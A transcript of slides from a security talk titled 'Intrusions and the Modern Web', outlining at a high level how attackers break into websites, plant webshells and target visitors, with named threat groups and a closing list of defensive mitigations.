Intrusions and the Modern Web

Transcript

1. Intrusions and the Modern Web Benjamin Scott [email protected]

2. The Modern Web Threat model high - organized e-crime /

   espionage groups Risk profile high - web developers want features / uptime Defense budget low - until breach hits the news

3. Goal of Intrusions Liquid assets credit cards / incoming traffic

   / hosting Enterprise access non-segmented network / shared admin Great visibility build profile of visitors who trust the site

4. Intrusion Lifecycle Break In find and exploit websec / appsec

   issue Dig In install persistent backdoor Spread Out rinse and repeat

5. Break In Choose target highly trafficked / VIPs of interest

   Try bruteforce default admin / SQLi / file inclusion Use exploit vulnerable service / CMS

6. (really) Break In Steal creds phish admins / keylog home

   machines Buy access hire mercenaries / logins from underground SIGINT Use active MITM to inject binaries

7. Dig In Install webshell e-crime - PHP shells CN: Shell

   Crew - ASP shells RU: Crouching Yeti - JavaScript patchwork RU: APT28 - custom kit with analytics Keep access local privilege escalation / new accounts

8. Spread Out Identify victims profile visitors / validate VIPs Deliver

   exploits serve up tailored exploit Relay traffic implant commands sent via covert channel

9. Mitigations Monitoring new referers / odd scripts / insecure configs

   Agile response share tools between operations / security / IT Clean deploys test appsec for CI / hardened images / CSP Hygiene checks scan / honeyclient / red team your site

10. Thanks for listening Benjamin Scott [email protected] github.com/benjaminxscott about.me/benjaminxscott